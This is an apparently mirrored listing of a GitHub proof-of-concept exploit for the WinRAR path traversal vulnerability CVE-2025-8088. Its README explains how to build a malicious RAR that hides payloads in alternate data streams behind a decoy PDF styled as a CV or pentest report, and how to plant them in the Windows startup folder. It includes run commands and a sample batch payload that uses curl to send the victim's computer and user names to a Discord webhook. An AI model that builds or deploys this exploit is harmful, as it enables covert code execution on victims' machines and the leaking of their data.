CVE-2025-8088 PoC — WinRAR 安全漏洞

Source

https://github.com/pentestfunctions/best-CVE-2025-8088

Associated Vulnerability

Title:WinRAR 安全漏洞 (CVE-2025-8088)
Description:WinRAR是WinRAR公司的一款文件压缩器。该产品支持RAR、ZIP等格式文件的压缩和解压等。 WinRAR存在安全漏洞，该漏洞源于路径遍历问题，可能导致任意代码执行。

Description

Winrar CVE exploitation before 7.13 using multiple ADS streams on a single file (Custom PDF implementation)

Readme

# CVE-2025-8088 WinRAR Exploit 🔓

A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.

- The issue with a lot of the others is they do not embedd multiple ADS streams requiring either luck you have the right path traversal or know the exact username/extraction directory. 

<p align="center">
  <img src="https://github.com/pentestfunctions/best-CVE-2025-8088/blob/main/assets/winrar_exploit.gif?raw=true">
</p>

## 🚀 How It Works

1. Creates a Decoy Document 📄 - Generates professional-looking PDF (CV or pentest report)
2. Embeds Multiple ADS Streams 🔄 - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers ⚙️ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup 📂 - Attempts to write payload to Windows startup folder when extracted

## 🛠️ Usage
```bash
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py
```
## ✏️ Payload Customization
Edit the payload to call a Discord webhook:

```bash
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
```

Replace YOUR_DISCORD_WEBHOOK_URL with your actual webhook URL.

## 🔄 Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (≤7.12)
2. Payload gets written to startup folder:
   ```bash
   AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
   ```
3. On next reboot ➡️ payload executes automatically

## 📋 Requirements
- Windows OS 🪟
- Python 3.x 🐍
- WinRAR installed
- ReportLab library (pip install reportlab)

File Snapshot


 [4.0K]  /data/pocs/7b603277940cf330067b360f0ae9d45c39cb3a4f
├── [4.0K]  assets
│   ├── [   1]  info.md
│   └── [7.8M]  winrar_exploit.gif
├── [ 24K]  CVE-2025-8088.py
├── [2.0K]  README.md
└── [  18]  requirements.txt

1 directory, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!